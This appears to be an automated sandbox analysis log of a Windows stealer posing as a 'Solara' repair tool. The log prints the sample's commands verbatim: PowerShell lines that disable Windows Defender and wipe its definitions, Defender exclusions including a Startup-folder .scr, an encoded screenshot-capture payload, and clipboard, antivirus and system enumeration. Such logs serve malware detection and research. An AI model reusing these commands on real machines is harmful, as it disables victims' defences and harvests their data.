              Source: cmd.exe, 00000001.00000002.2106257882.00007FFE11EBE000.00000004.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs cmd.exe
              Source: cmd.exe, 00000001.00000002.2105503765.00007FFE10313000.00000004.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs cmd.exe
              Source: cmd.exe, 00000001.00000002.2107931730.00007FFE13348000.00000004.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs cmd.exe
              Source: cmd.exe, 00000001.00000002.2107620418.00007FFE1330C000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs cmd.exe
              Source: cmd.exe, 00000001.00000002.2105816102.00007FFE11528000.00000004.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs cmd.exe
              Source: cmd.exeBinary or memory string: OriginalFilenameWPR.exen' vs cmd.exe
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
              Source: C:\Users\user\Desktop\cmd.exeProcess created: Commandline size = 3647
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: C:\Users\user\Desktop\cmd.exeProcess created: Commandline size = 3647
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: libcrypto-1_1.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9987754672181373
              Source: libssl-1_1.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9903915229885057
              Source: python310.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9989695677157001
              Source: sqlite3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9974986001493175
              Source: unicodedata.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9949597928113553
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@135/56@2/3
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3FCAFC GetLastError,FormatMessageW,65_2_00007FF69A3FCAFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3FEF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,65_2_00007FF69A3FEF50
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A42B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,65_2_00007FF69A42B57C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A403144 GetDiskFreeSpaceExW,65_2_00007FF69A403144
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5416:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8704:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8788:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8648:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7364:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8140:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8156:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8864:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7920:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8248:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7928:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9160:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8412:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2936:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8616:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1260:120:WilError_03
              Source: C:\Users\user\Desktop\cmd.exeMutant created: \Sessions\1\BaseNamedObjects\v
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8504:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8132:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8148:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8120:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7244:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
              Source: C:\Users\user\Desktop\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72642Jump to behavior
              Source: cmd.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeFile read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\cmd.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: cmd.exe, 00000001.00000002.2104624049.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: cmd.exe, 00000001.00000002.2104624049.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: cmd.exe, 00000001.00000002.2104624049.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: cmd.exe, 00000001.00000002.2104624049.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: cmd.exe, 00000001.00000002.2104624049.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: cmd.exe, 00000001.00000002.2104624049.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: cmd.exe, 00000001.00000002.2104624049.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: cmd.exeReversingLabs: Detection: 36%
              Source: C:\Users\user\Desktop\cmd.exeFile read: C:\Users\user\Desktop\cmd.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\cmd.exe "C:\Users\user\Desktop\cmd.exe"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Users\user\Desktop\cmd.exe "C:\Users\user\Desktop\cmd.exe"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\cmd.exe'"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Solara has been repaired.', 0, 'Solara | Repaired', 48+16);close()""
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ?.scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Solara has been repaired.', 0, 'Solara | Repaired', 48+16);close()"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ?.scr'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\cmd.exe'
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.cmdline"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES74CA.tmp" "c:\Users\user\AppData\Local\Temp\bcdu5fii\CSC91B7380AF2C2414A909984B12C6688DE.TMP"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
